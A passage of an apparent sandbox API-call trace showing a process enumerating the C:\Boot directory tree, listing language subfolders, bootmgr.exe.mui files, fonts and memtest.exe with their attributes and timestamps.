RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.303] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.304] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.304] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.304] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.304] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.304] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0035.304] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.304] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.305] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.305] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.305] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.305] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.305] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0035.305] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.305] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.305] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.305] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.305] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.305] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.305] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0035.306] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.306] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.306] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.306] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0035.307] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.307] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.307] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0035.307] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.307] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.307] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.308] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.308] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.308] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.308] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0035.308] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.308] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.308] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.308] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.308] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.308] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.308] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0035.308] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.308] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.309] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.309] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.309] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.309] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.309] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0035.309] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.310] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.310] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.310] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.310] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.310] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.310] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0035.310] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.310] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.314] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.314] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.314] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.314] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.314] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0035.314] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.314] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.315] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.315] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.315] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.315] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.315] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0035.315] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.315] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.316] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.316] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, 